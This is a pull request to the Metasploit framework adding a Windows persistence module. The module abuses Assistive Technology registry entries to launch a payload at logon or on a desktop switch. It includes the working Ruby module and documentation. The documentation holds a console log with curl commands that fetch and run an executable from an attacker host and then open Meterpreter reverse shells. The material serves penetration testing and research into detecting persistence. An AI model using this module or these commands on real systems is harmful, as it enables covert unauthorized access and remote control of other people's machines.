### PR TITLE
assistive technology persistence

### DIFF
--- a/documentation/modules/exploit/windows/persistence/assistive_technology.md
+++ b/documentation/modules/exploit/windows/persistence/assistive_technology.md
@@ -1,0 +1,111 @@
+## Vulnerable Application
+
+This module achieves persistence by registering a custom Assistive Technology (AT) in the Windows registry.
+Then it configures the system to launch the AT executable during user logon or desktop switch (such as with
+an admin prived program).
+Requires Windows 8 or higher and administrative privileges.
+
+## Verification Steps
+
+1. Get session on target with admin/system privs
+2. `use exploit/windows/persistence/assistive_technology`
+3. `set payload <payload>`
+4. `set session <session>`
+5. `exploit`
+6. logon or desktop switch
+7. Get a session
+
+## Options
+
+### PAYLOAD_NAME
+
+Name of payload file to write. Random string as default.
+
+### NAME
+
+Name of assistive technolog to create. Random string as default.
+
+### DESCRIPTION
+
+Description of assistive technolog to create. Random string as default.
+
+## Scenarios
+
+### Windows 10 1909 (10.0 Build 18363)
+
+```
+resource (/root/.msf4/msfconsole.rc)> setg verbose true
+verbose => true
+resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
+payload => cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL
+fetch_command => CURL
+resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true
+fetch_pipe => true
+resource (/root/.msf4/msfconsole.rc)> set lport 4450
+lport => 4450
+resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3
+FETCH_URIPATH => w3
+resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB
+FETCH_FILENAME => mkaKJBzbDB
+resource (/root/.msf4/msfconsole.rc)> to_handler
+[*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/KAdxHNQrWO8cy5I90gLkHg & start /B %TEMP%\mkaKJBzbDB.exe
+
+[*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd
+[*] Payload Handler Started as Job 0
+[*] Fetch handler listening on 1.1.1.1:8080
+[*] HTTP server started
+[*] Adding resource /KAdxHNQrWO8cy5I90gLkHg
+[*] Adding resource /w3
+[*] Started reverse TCP handler on 1.1.1.1:4450 
+msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > 
+[*] Client 2.2.2.2 requested /KAdxHNQrWO8cy5I90gLkHg
+[*] Sending payload to 2.2.2.2 (curl/7.79.1)
+[*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:49822) at 2025-12-06 11:57:16 -0500
+
+msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: WIN10PROLICENSE\windows
+meterpreter > sysinfo
+Computer        : WIN10PROLICENSE
+OS              : Windows 10 1909 (10.0 Build 18363).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > background
+[*] Backgrounding session 1...
+msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/windows/persistence/assistive_technology 
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+msf exploit(windows/persistence/assistive_technology) > set session 1
+session => 1
+msf exploit(windows/persistence/assistive_technology) > set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+msf exploit(windows/persistence/assistive_technology) > exploit
+[*] Exploit running as background job 1.
+[*] Exploit completed, but no session was created.
+msf exploit(windows/persistence/assistive_technology) > 
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Likely exploitable
+[*] Payload pathname: C:\Users\windows\AppData\Local\Temp\zcazXFGnVovdq.exe
+[*] Creating Assistive Technology EUZXcigpS registry entries
+[*] Setting AT to start during login
+[+] New AT added. Will launch on logon or desktop switch.
+[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20251206.5751/WIN10PROLICENSE_20251206.5751.rc
+[*] Sending stage (188998 bytes) to 2.2.2.2
+[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49826) at 2025-12-06 11:58:10 -0500
+
+msf exploit(windows/persistence/assistive_technology) > sessions -i 2
+[*] Starting interaction with 2...
+
+meterpreter > getuid
+Server username: WIN10PROLICENSE\windows
+```

--- a/documentation/modules/exploit/windows/persistence/assistive_technology.md
+++ b/documentation/modules/exploit/windows/persistence/assistive_technology.md
@@ -33,6 +33,8 @@ Description of assistive technolog to create. Random string as default.
 
 ### Windows 10 1909 (10.0 Build 18363)
 
+Original Shell
+
 ```
 resource (/root/.msf4/msfconsole.rc)> setg verbose true
 verbose => true
@@ -82,6 +84,11 @@ Logged On Users : 2
 Meterpreter     : x64/windows
 meterpreter > background
 [*] Backgrounding session 1...
+```
+
+Persistence
+
+```
 msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/windows/persistence/assistive_technology 
 [*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
 msf exploit(windows/persistence/assistive_technology) > set session 1
@@ -100,6 +107,11 @@ msf exploit(windows/persistence/assistive_technology) >
 [*] Setting AT to start during login
 [+] New AT added. Will launch on logon or desktop switch.
 [*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20251206.5751/WIN10PROLICENSE_20251206.5751.rc
+```
+
+Trigger (started an admin command prompt)
+
+```
 [*] Sending stage (188998 bytes) to 2.2.2.2
 [*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49826) at 2025-12-06 11:58:10 -0500
 

--- a/modules/exploits/windows/persistence/assistive_technology.rb
+++ b/modules/exploits/windows/persistence/assistive_technology.rb
@@ -93,7 +93,9 @@ class MetasploitModule < Msf::Exploit::Local
     payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(6..13)))
     temp_path = writable_dir
     payload_exe = generate_payload_exe
-    payload_pathname = temp_path + '\\' + payload_name + '.exe'
+    payload_pathname = temp_path + '\\' + payload_name
+    payload_pathname += '.exe' unless payload_pathname.downcase.end_with?('.exe')
+
     vprint_status("Payload pathname: #{payload_pathname}")
     fail_with(Failure::UnexpectedReply, "Error writing payload to: #{payload_pathname}") unless write_file(payload_pathname, payload_exe)
     at_name = datastore['NAME'] || Rex::Text.rand_text_alpha((rand(6..13)))

--- a/modules/exploits/windows/persistence/assistive_technology.rb
+++ b/modules/exploits/windows/persistence/assistive_technology.rb
@@ -1,0 +1,113 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Exploit::Local::Persistence
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Post::Windows::Registry
+  include Msf::Post::Windows::Priv
+
+  AT_REG_PATH = 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs'
+  STARUP_REG_PATH = 'HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility'
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Assistive Technologies Persistence',
+        'Description' => %q{
+          This module achieves persistence by registering a custom Assistive Technology (AT) in the Windows registry.
+          Then it configures the system to launch the AT executable during user logon or desktop switch (such as with
+          an admin prived program).
+          Requires Windows 8 or higher and administrative privileges.
+        },
+        'Author' => ['h00die'],
+        'Platform' => ['win'],
+        'SessionTypes' => ['meterpreter', 'shell'],
+        'References' => [
+          ['ATT&CK', Mitre::Attack::Technique::T1546_008_ACCESSIBILITY_FEATURES],
+          ['URL', 'https://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/'],
+          ['URL', 'https://msdn.microsoft.com/ru-ru/library/windows/desktop/bb879984.aspx']
+        ],
+        'Targets' => [
+          [ 'Automatic', {} ]
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2016-07-22',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION, EVENT_DEPENDENT],
+          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('PAYLOAD_NAME', [false, 'Name of payload file to write. Random string as default.']),
+      OptString.new('NAME', [false, 'Name of assistive technolog to create. Random string as default.']),
+      OptString.new('DESCRIPTION', [false, 'Description of assistive technolog to create. Random string as default.']),
+    ])
+  end
+
+  def create_at(at_name, payload_path)
+    target_key = "#{AT_REG_PATH}\\#{at_name}"
+    at_description = datastore['DESCRIPTION'] || Rex::Text.rand_text_alpha((rand(6..13)))
+
+    registry_createkey(target_key)
+    registry_setvaldata(target_key, 'ApplicationName', '@%SystemRoot%\\system32\\AccessibilityCPL.dll,-85', 'REG_EXPAND_SZ')
+    registry_setvaldata(target_key, 'ATExe', payload_path.split('\\').last, 'REG_SZ')
+    registry_setvaldata(target_key, 'CopySettingsToLockedDesktop', 1, 'REG_DWORD')
+    registry_setvaldata(target_key, 'Description', at_description, 'REG_SZ')
+    registry_setvaldata(target_key, 'Profile', '<HCIModel><Accommodation type="mild dexterity"</HCIModel>', 'REG_SZ') # https://learn.microsoft.com/en-us/windows/win32/winauto/ease-of-access---assistive-technology-registration?redirectedfrom=MSDN#hci-profile
+    registry_setvaldata(target_key, 'SimpleProfile', at_name, 'REG_SZ')
+    registry_setvaldata(target_key, 'StartExe', payload_path, 'REG_EXPAND_SZ')
+    registry_setvaldata(target_key, 'TerminateOnDesktopSwitch', 0, 'REG_DWORD')
+  end
+
+  def writable_dir
+    d = super
+    return session.sys.config.getenv(d) if d.start_with?('%')
+
+    d
+  end
+
+  def check
+    print_warning('Payloads in %TEMP% will only last until reboot, you want to choose elsewhere.') if datastore['WritableDir'].start_with?('%TEMP%') # check the original value
+    return CheckCode::Safe("#{writable_dir} doesnt exist") unless exists?(writable_dir)
+
+    version = get_version_info
+    return CheckCode::Safe('Only supported on Windows 8 and above') unless version.build_number >= Msf::WindowsVersion::Win8
+
+    return CheckCode::Safe('You have admin rights to run this Module') unless is_admin?
+
+    CheckCode::Appears('Likely exploitable')
+  end
+
+  def install_persistence
+    payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(6..13)))
+    temp_path = writable_dir
+    payload_exe = generate_payload_exe
+    payload_pathname = temp_path + '\\' + payload_name + '.exe'
+    vprint_status("Payload pathname: #{payload_pathname}")
+    fail_with(Failure::UnexpectedReply, "Error writing payload to: #{payload_pathname}") unless write_file(payload_pathname, payload_exe)
+    at_name = datastore['NAME'] || Rex::Text.rand_text_alpha((rand(6..13)))
+    vprint_status("Creating Assistive Technology #{at_name} registry entries")
+    create_at(at_name, payload_pathname)
+    vprint_status('Setting AT to start during login')
+    current_value = registry_getvaldata(STARUP_REG_PATH, 'Configuration')
+    new_value = current_value.empty? ? [] : current_value.split(',').map(&:strip)
+    new_value.append(at_name)
+    registry_setvaldata(STARUP_REG_PATH, 'Configuration', new_value.join(','), 'REG_SZ')
+
+    print_good('New AT added. Will launch on logon or desktop switch (such as with an admin prived program).')
+    @clean_up_rc << "rm \"#{payload_pathname.gsub('\\', '\\\\\\\\')}\"\n"
+    @clean_up_rc << "execute -f cmd.exe -a '/c reg delete \"#{AT_REG_PATH}\\#{at_name}\" /f' -H\n"
+    @clean_up_rc << "execute -f cmd.exe -a '/c reg add \"#{STARUP_REG_PATH}\" /v Configuration /t REG_SZ /d \"#{current_value}\" /f' -H\n"
+  end
+end

--- a/modules/exploits/windows/persistence/assistive_technology.rb
+++ b/modules/exploits/windows/persistence/assistive_technology.rb
@@ -29,6 +29,8 @@ class MetasploitModule < Msf::Exploit::Local
         },
         'Author' => ['h00die'],
         'Platform' => ['win'],
+        'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],
+
         'SessionTypes' => ['meterpreter', 'shell'],
         'References' => [
           ['ATT&CK', Mitre::Attack::Technique::T1546_008_ACCESSIBILITY_FEATURES],


### PR DESCRIPTION
This PR adds a new windows persistence by registering an assistive technology for the current user, and assigns it to start at logon or desktop switch (like a admin permissions prompt)

## Verification

1. Get session on target with admin/system privs
2. `use exploit/windows/persistence/assistive_technology`
3. `set payload <payload>`
4. `set session <session>`
5. `exploit`
6. logon or desktop switch
7. Get a session